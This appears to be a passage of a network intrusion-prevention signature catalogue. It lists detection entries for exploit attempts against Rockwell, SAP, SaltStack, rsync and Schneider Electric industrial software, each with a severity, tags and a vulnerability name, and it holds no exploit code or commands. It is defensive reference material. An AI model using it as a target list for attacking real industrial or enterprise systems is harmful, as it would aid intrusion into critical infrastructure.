Tags: Any Operating System, Any Hardware, Rockwell Automation ThinManager ThinServer, CVE2023, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1627-5242
Last changed: sgpkg-ips-1652-5242
Vulnerability: Rockwell-Automation-Thinmanager-Type-13-Synchronization-Integer-Overflow
Description:
Back to top

Generic_CS-Rockwell-Automation-Thinmanager-Type-17-Monitor-Missing-Authorization

About this situation: An attempt to exploit a vulnerability in Rockwell Automation ThinManager ThinServer detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Rockwell Automation ThinManager ThinServer, CVE2024, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1812-5242
Last changed: sgpkg-ips-1812-5242
Vulnerability: Rockwell-Automation-Thinmanager-Type-17-Monitor-Missing-Authorization
Description:
Back to top

Generic_CS-Rockwell-Automation-Thinmanager-Type-21-Synchronization-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in Rockwell Automation ThinManager ThinServer detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Rockwell Automation ThinManager ThinServer, CVE2023, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1644-5242
Last changed: sgpkg-ips-1644-5242
Vulnerability: Rockwell-Automation-Thinmanager-Type-21-Synchronization-Directory-Traversal
Description:
Back to top

Generic_CS-Rockwell-Automation-Thinmanager-Type-38-Synchronization-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in Rockwell Automation ThinManager ThinServer detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Rockwell Automation ThinManager ThinServer, CVE2023, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1629-5242
Last changed: sgpkg-ips-1629-5242
Vulnerability: Rockwell-Automation-Thinmanager-Type-38-Synchronization-Directory-Traversal
Description:
Back to top

Generic_CS-Rockwell-RSLogix-Heap-Overflow-Vulnerability

About this situation: A vulnerability in Rockwell RSLogix
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Rockwell Automation RSLogix 5000, Windows not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-619-5211
Last changed: sgpkg-ips-619-5211
Vulnerability: Rockwell-RSLogix-Heap-Overflow-Vulnerability
Description:
Back to top

Generic_CS-RPC-Ypupdated-Arbitrary-Command-Execution

About this situation: Attempt to exploit a command injection vulnerability in the rpc.ypupdated service detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Solaris, Any Hardware, rpc.ypupdated, CVE1999, Solaris not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-384-4219
Last changed: sgpkg-ips-1597-5242
Vulnerability: RPC-Ypupdated-Arbitrary-Command-Execution
Description:
Back to top

Generic_CS-Rpc445-MS03-049

About this situation: Buffer Overflow in Windows RPC Service (MS03-049)
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows XP, Windows 2000, Any Hardware, RPC, MS2003, CVE2003, Windows XP not specific, Windows 2000 not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-113-2032
Last changed: sgpkg-ips-346-4219
Vulnerability: RPC-BOF-MS03-049
Description:
Back to top

Generic_CS-RSH-Authentication-Scanner-Vulnerability

About this situation: An attempt to exploit an RSH Authentication Scanner vulnerability detected.
Context: TCP Client Stream Unknown
Severity: 7
Tags: Unix, Any Hardware, rsh, CVE1999, Unix not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-739-5211
Last changed: sgpkg-ips-739-5211
Vulnerability: RSH-Authentication-Scanner-Vulnerability
Description:
Back to top

Generic_CS-RSYNC-Arbitrary-File-Overwriting

About this situation: An attempt to exploit a vulnerability in rsync detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Unix, Any Hardware, rsync, CVE2004, Unix not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-418-4219
Last changed: sgpkg-ips-418-4219
Vulnerability: RSYNC-Backup-Dir-Directory-Traversal
Description:
Back to top

Generic_CS-Rsync-Receive_Xattr-Heap-Based-Buffer-Overread

About this situation: An attempt to exploit a vulnerability in rsync Project rsync detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, rsync, CVE2017, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1023-5242
Last changed: sgpkg-ips-1023-5242
Vulnerability: Rsync-Receive_Xattr-Heap-Based-Buffer-Overread
Description:
Back to top

Generic_CS-Rsyslog-Pri-Value-Parsing-Integer-Overflow-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in Infodrom Oldenburg sysklogd detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, rsyslog, CVE2014, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-622-5211
Last changed: sgpkg-ips-622-5211
Vulnerability: Rsyslog-Pri-Value-Parsing-Integer-Overflow-Denial-Of-Service
Description:
Back to top

Generic_CS-RTSP-Describe-Request-Long-URI-Header

About this situation: Very Long URI Header detected in RTSP-request
Context: TCP Client Stream Unknown
Severity: 2
Tags: Any Operating System, Any Hardware, Any Software, Any Operating System not specific, Any Software not specific, Other Suspicious Traffic, Anomalies, TCP Client Traffic
First detected in: sgpkg-ips-503-5211
Last changed: sgpkg-ips-516-5211
Vulnerability: RTSP-Describe-Request-Long-URI-Header
Description:
Back to top

Generic_CS-Sage-Saleslogix-GetConnection-Account-Disclosure

About this situation: Sage SalesLogix GetConnection Account Disclosure detected
Context: TCP Client Stream Unknown
Severity: 2
Tags: Any Operating System, Any Hardware, SalesLogix, CVE2004, Any Operating System not specific, Potential Disclosure, TCP Client Traffic
First detected in: sgpkg-ips-507-5211
Last changed: sgpkg-ips-507-5211
Vulnerability: Sage-Saleslogix-GetConnection-Account-Disclosure
Description:
Back to top

Generic_CS-Sage-X3-Administration-Service-Authentication-Bypass-Command-Execution

About this situation: An attempt to exploit a vulnerability in Sage X3 detected.
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Sage X3, CVE2020, Windows not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1401-5242
Last changed: sgpkg-ips-1401-5242
Vulnerability: Sage-X3-Administration-Service-Authentication-Bypass-Command-Execution
Description:
Back to top

Generic_CS-SaltStack-Salt-Authorization-Bypass

About this situation: An attempt to exploit a vulnerability in SaltStack Salt detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, SaltStack Salt, CVE2020, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1248-5242
Last changed: sgpkg-ips-1250-5242
Vulnerability: SaltStack-Salt-Authorization-Bypass
Description:
Back to top

Generic_CS-SaltStack-Salt-Clearfuncs-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in SaltStack Salt detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, SaltStack Salt, CVE2020, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1252-5242
Last changed: sgpkg-ips-1252-5242
Vulnerability: SaltStack-Salt-Clearfuncs-Directory-Traversal
Description:
Back to top

Generic_CS-Sangoma-Asterisk-Command-Execution

About this situation: An attempt to exploit a vulnerability in Sangoma Asterisk detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Sangoma Asterisk, CVE2019, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1224-5242
Last changed: sgpkg-ips-1224-5242
Vulnerability: Sangoma-Asterisk-Command-Execution
Description:
Back to top

Generic_CS-SAP-Business-One-License-Manager-Buffer-Overflow

About this situation: An attempt to exploit a SAP Business One License Manager Buffer Overflow vulnerability detected.
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, SAP License Manager, CVE2009, Windows not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-721-5211
Last changed: sgpkg-ips-721-5211
Vulnerability: SAP-Business-One-License-Manager-Buffer-Overflow
Description:
Back to top

Generic_CS-SAP-Business-One-License-Manager-Buffer-Overflow-2

About this situation: An attempt to exploit a SAP Business One License Manager Buffer Overflow vulnerability detected.
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, SAP License Manager, CVE2009, Windows not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1060-5242
Last changed: sgpkg-ips-1060-5242
Vulnerability: SAP-Business-One-License-Manager-Buffer-Overflow
Description:
Back to top

Generic_CS-SAP-Gateway-Remote-Code-Execution

About this situation: An attempt to exploit a misconfigured ACL leading to remote code execution detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, SAP, Any Operating System not specific, SAP not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1156-5242
Last changed: sgpkg-ips-1156-5242
Vulnerability: SAP-Gateway-Remote-Code-Execution
Description:
Back to top

Generic_CS-SAP-GUI-Regsvr32.exe-Rule-Security-Policy-Bypass

About this situation: An attempt to exploit a vulnerability in SAP GUI detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, SAP GUI, CVE2017, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-880-5242
Last changed: sgpkg-ips-880-5242
Vulnerability: SAP-GUI-Regsvr32.exe-Rule-Security-Policy-Bypass
Description:
Back to top

Generic_CS-SAP-Netweaver-Adiexecblkconv-Message-Server-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in SAP NetWeaver detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, SAP NetWeaver, CVE2013, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-514-5211
Last changed: sgpkg-ips-514-5211
Vulnerability: SAP-Netweaver-Adiexecblkconv-Message-Server-Buffer-Overflow
Description:
Back to top

Generic_CS-SAP-Netweaver-Diagieventsource-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in SAP NetWeaver detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, SAP NetWeaver, CVE2012, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-456-5211
Last changed: sgpkg-ips-527-5211
Vulnerability: SAP-Netweaver-Diagieventsource-Denial-Of-Service
Description:
Back to top

Generic_CS-SAP-Netweaver-Diagtracehex-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in SAP NetWeaver detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, SAP NetWeaver, CVE2012, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-455-5211
Last changed: sgpkg-ips-455-5211
Vulnerability: SAP-Netweaver-Diagtracehex-Denial-Of-Service
Description:
Back to top

Generic_CS-SAP-Netweaver-Dispatcher-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in SAP NetWeaver detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, SAP NetWeaver, CVE2012, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-455-5211
Last changed: sgpkg-ips-1583-5242
Vulnerability: SAP-Netweaver-Dispatcher-Stack-Buffer-Overflow
Description:
Back to top

Generic_CS-SAP-Netweaver-Enqueue-Server-DoS

About this situation: SAP Netweaver Enqueue Server Trace Pattern Denial of Service Vulnerability
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, SAP NetWeaver, Windows not specific, Suspected Denial of Service, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-627-5211
Last changed: sgpkg-ips-627-5211
Vulnerability: SAP-Netweaver-Enqueue-Server-DoS
Description:
Back to top

Generic_CS-SAP-Netweaver-Message-Server-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in SAP NetWeaver detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, SAP NetWeaver, CVE2013, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-513-5211
Last changed: sgpkg-ips-513-5211
Vulnerability: SAP-Netweaver-Message-Server-Memory-Corruption
Description:
Back to top

Generic_CS-SAP-Sybase-Esp-Parse-Unsafe-Pointer-Dereference

About this situation: A vulnerable function call in SAP Sybase Event Stream Processor (ESP) Studio detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Sybase Event Stream Processor Studio, CVE2014, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-592-5211
Last changed: sgpkg-ips-622-5211
Vulnerability: SAP-Sybase-Esp-Parse-Unsafe-Pointer-Dereference
Description:
Back to top

Generic_CS-SAP-Sybase-Event-Stream-Processor-Esp_Parse-Connection-Unsafe-Pointer-Dereference

About this situation: An attempt to exploit a vulnerability in SAP Sybase Event Stream Processor (ESP) detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Sybase Event Stream Processor Studio, CVE2014, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-595-5211
Last changed: sgpkg-ips-595-5211
Vulnerability: SAP-Sybase-Event-Stream-Processor-Parse-Connection-Unsafe-Pointer-Dereference
Description:
Back to top

Generic_CS-SAP-Sybase-Event-Stream-Processor-Esp_Parse-Connection-Vulnerability

About this situation: An attempt to exploit a vulnerability in SAP Sybase Event Stream Processor (ESP) detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Sybase Event Stream Processor Studio, CVE2014, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-595-5211
Last changed: sgpkg-ips-595-5211
Vulnerability: SAP-Sybase-Event-Stream-Processor-Esp_Parse-Connection-Vulnerability
Description:
Back to top

Generic_CS-Satel-Iberia-SenNet-Command-Injection

About this situation: A Satel Iberia SenNet Command Injection vulnerability
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Satel Iberia, CVE2017, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1028-5242
Last changed: sgpkg-ips-1700-5242
Vulnerability: Satel-Iberia-SenNet-Command-Injection
Description:
Back to top

Generic_CS-Scadatec-Limited-Procyon-Buffer-Overflow

About this situation: Scadatec Limited Procyon Buffer Overflow
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Scadatec Procyon, CVE2011, Windows not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-654-5211
Last changed: sgpkg-ips-654-5211
Vulnerability: Scadatec-Limited-Procyon-Buffer-Overflow
Description:
Back to top

Generic_CS-Schneider-Electric-Apc-Easy-UPS-Online-Getmacaddressbyip-Command-Injection

About this situation: An attempt to exploit a vulnerability in Schneider Electric APC Easy UPS On-Line Software detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Schneider Electric APC, CVE2023, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1590-5242
Last changed: sgpkg-ips-1590-5242
Vulnerability: Schneider-Electric-Apc-Easy-UPS-Online-Getmacaddressbyip-Command-Injection
Description:
Back to top

Generic_CS-Schneider-Electric-C-Bus-Toolkit-Access-Save-Command-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in Schneider Electric C-Bus Toolkit detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Schneider Electric C-Bus Toolkit, CVE2021, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1389-5242
Last changed: sgpkg-ips-1389-5242
Vulnerability: Schneider-Electric-C-Bus-Toolkit-Access-Save-Command-Directory-Traversal
Description:
Back to top

Generic_CS-Schneider-Electric-C-Bus-Toolkit-File-Delete-Command-Arbitrary-File-Delete

About this situation: An attempt to exploit a vulnerability in Schneider Electric C-Bus Toolkit detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Schneider Electric C-Bus Toolkit, CVE2023, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1704-5242
Last changed: sgpkg-ips-1727-5242
Vulnerability: Schneider-Electric-C-Bus-Toolkit-File-Delete-Command-Arbitrary-File-Delete
Description:
Back to top

Generic_CS-Schneider-Electric-C-Bus-Toolkit-File-Download-Command-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in Schneider Electric C-Bus Toolkit detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Schneider Electric C-Bus Toolkit, CVE2023, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1672-5242
Last changed: sgpkg-ips-1727-5242
Vulnerability: Schneider-Electric-C-Bus-Toolkit-File-Download-Command-Directory-Traversal
Description:
Back to top

Generic_CS-Schneider-Electric-C-Bus-Toolkit-File-Upload-Project-Name-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in Schneider Electric C-Bus Toolkit detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Schneider Electric C-Bus Toolkit, CVE2023, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1665-5242
Last changed: sgpkg-ips-1665-5242
Vulnerability: Schneider-Electric-C-Bus-Toolkit-File-Upload-Project-Name-Directory-Traversal
Description:
Back to top

Generic_CS-Schneider-Electric-C-Bus-Toolkit-FILE-UPLOAD-Unrestricted-File-Upload

About this situation: An attempt to exploit a vulnerability in Schneider Electric C-Bus Toolkit detected.
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Schneider Electric C-Bus Toolkit, CVE2021, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1391-5242
Last changed: sgpkg-ips-1665-5242
Vulnerability: Schneider-Electric-C-Bus-Toolkit-FILE-UPLOAD-Unrestricted-File-Upload
Description:
Back to top

Generic_CS-Schneider-Electric-C-Bus-Toolkit-Project-Restore-Information-Disclosure

About this situation: An attempt to exploit a vulnerability in Schneider Electric C-Bus Toolkit detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Schneider Electric C-Bus Toolkit, CVE2021, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1393-5242
Last changed: sgpkg-ips-1393-5242
Vulnerability: Schneider-Electric-C-Bus-Toolkit-Project-Restore-Information-Disclosure
Description:
Back to top

Generic_CS-Schneider-Electric-IGSS-Dc-Opcode-101-Heap-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Schneider Electric IGSS detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, IGSS Server, CVE2021, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1440-5242
Last changed: sgpkg-ips-1443-5242
Vulnerability: Schneider-Electric-IGSS-Dc-Opcode-101-Heap-Buffer-Overflow
Description:
Back to top

Generic_CS-Schneider-Electric-IGSS-Dc-Opcode-60-Arbitrary-File-Deletion

About this situation: An attempt to exploit a vulnerability in Schneider Electric IGSS detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, IGSS Server, CVE2021, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1443-5242
Last changed: sgpkg-ips-1443-5242
Vulnerability: Schneider-Electric-IGSS-Dc-Opcode-60-Arbitrary-File-Deletion
Schneider-Electric-IGSS-dc.exe-Opcode-60-Arbitrary-File-Deletion
Description:
Back to top

Generic_CS-Schneider-Electric-IGSS-IGSSdataServer-CVE-2022-24313-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Schneider Electric IGSS detected.
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Schneider Electric IGSS, CVE2022, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1481-5242
Last changed: sgpkg-ips-1481-5242
Vulnerability: Schneider-Electric-IGSS-IGSSdataServer-CVE-2022-24313-Stack-Buffer-Overflow
Description:
Back to top

Generic_CS-Schneider-Electric-IGSS-IGSSdataServer-Opcode1-Out-Of-Bounds-Write

About this situation: An attempt to exploit a vulnerability in Schneider Electric IGSS detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Schneider Electric IGSS, CVE2022, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1488-5242
Last changed: sgpkg-ips-1488-5242
Vulnerability: Schneider-Electric-IGSS-IGSSdataServer-Opcode1-Out-Of-Bounds-Write
Description:
Back to top

Generic_CS-Schneider-Electric-IGSS-IGSSdataserver.exe-Almnote-Integer-Overflow

About this situation: An attempt to exploit a vulnerability in Schneider Electric IGSS detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Schneider Electric IGSS, CVE2022, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1511-5242
Last changed: sgpkg-ips-1511-5242
Vulnerability: Schneider-Electric-IGSS-IGSSdataserver.exe-Almnote-Integer-Overflow
Description:
Back to top

Generic_CS-Schneider-Electric-IGSS-IGSSdataserver.exe-CVE-2022-24315-Out-of-Bounds-Read

About this situation: An attempt to exploit a vulnerability in Schneider Electric IGSS detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Schneider Electric IGSS, CVE2022, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1455-5242
Last changed: sgpkg-ips-1455-5242
Vulnerability: Schneider-Electric-IGSS-IGSSdataserver.exe-CVE-2022-24315-Out-of-Bounds-Read
Description:
Back to top

Generic_CS-Schneider-Electric-IGSS-IGSSdataserver.exe-Opcode-5-Out-Of-Bounds-Write

About this situation: An attempt to exploit a vulnerability in Schneider Electric IGSS detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Schneider Electric IGSS, CVE2022, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1541-5242
Last changed: sgpkg-ips-1541-5242
Vulnerability: Schneider-Electric-IGSS-IGSSdataserver.exe-Opcode-5-Out-Of-Bounds-Write
Description:
Back to top

Generic_CS-Schneider-Electric-IGSS-IGSSdataserver.exe-Opcode-6-Out-Of-Bounds-Write

About this situation: An attempt to exploit a vulnerability in Schneider Electric IGSS detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Schneider Electric IGSS, CVE2022, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1541-5242
Last changed: sgpkg-ips-1541-5242
Vulnerability: Schneider-Electric-IGSS-IGSSdataserver.exe-Opcode-6-Out-Of-Bounds-Write
Description:
Back to top

Generic_CS-Schneider-Electric-IGSS-IGSSupdateservice-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in Schneider Electric IGSS detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, IGSS Server, CVE2020, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1242-5242
Last changed: sgpkg-ips-1700-5242
Vulnerability: Schneider-Electric-IGSS-IGSSupdateservice-Directory-Traversal
Description:
Back to top

Generic_CS-Schneider-Electric-IGSS-Opcode2-Out-Of-Bounds-Write

About this situation: An attempt to exploit a vulnerability in Schneider Electric IGSS detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Schneider Electric IGSS, CVE2022, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1525-5242
Last changed: sgpkg-ips-1525-5242
Vulnerability: Schneider-Electric-IGSS-Opcode2-Out-Of-Bounds-Write
Description:
Back to top

Generic_CS-Schneider-Electric-Indusoft-Web-Studio-Remote-Agent-Remote-Code-Execution

About this situation: A Schneider Electric InduSoft Web Studio Remote Agent Remote Code Execution vulnerability
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Schneider Electric, CVE2015, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-999-5242
Last changed: sgpkg-ips-999-5242
Vulnerability: Schneider-Electric-Indusoft-Web-Studio-Remote-Agent-Remote-Code-Execution
Description:
Back to top

Generic_CS-Schneider-Electric-Indusoft-Web-Studio-Remote-Code-Execution-CVE-2018-8840

About this situation: An attempt to exploit a vulnerability in Schneider Electric InduSoft Web Studio detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Schneider Electric, CVE2018, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1865-5242
Last changed: sgpkg-ips-1865-5242
Vulnerability: Schneider-Electric-Indusoft-Web-Studio-Remote-Code-Execution-CVE-2018-8840
Description:
Back to top

Generic_CS-Schneider-Electric-Interactive-Graphical-SCADA-System-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Interactive Graphical SCADA Systems detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, 7T Interactive Graphical SCADA System, CVE2013, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1326-5242
Last changed: sgpkg-ips-1327-5242
Vulnerability: Schneider-Electric-Interactive-Graphical-SCADA-System-Buffer-Overflow
Description:
Back to top

Generic_CS-Schneider-Electric-SCADA-Expert-ClearSCADA-Authentication-Bypass

About this situation: An attempt to exploit a vulnerability in Schneider Electric ClearSCADA 2010 detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Schneider Electric ClearSCADA, CVE2014, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-610-5211
Last changed: sgpkg-ips-610-5211
Vulnerability: Schneider-Electric-SCADA-Expert-ClearSCADA-Authentication-Bypass
Description:
Back to top

Generic_CS-Schneider-Electric-Unity-Pro-Denial-Of-Service

About this situation: A vulnerability in Schneider Electric Unity Pro allowing denial of service.
Context: TCP Client Stream Unknown
Severity: 2
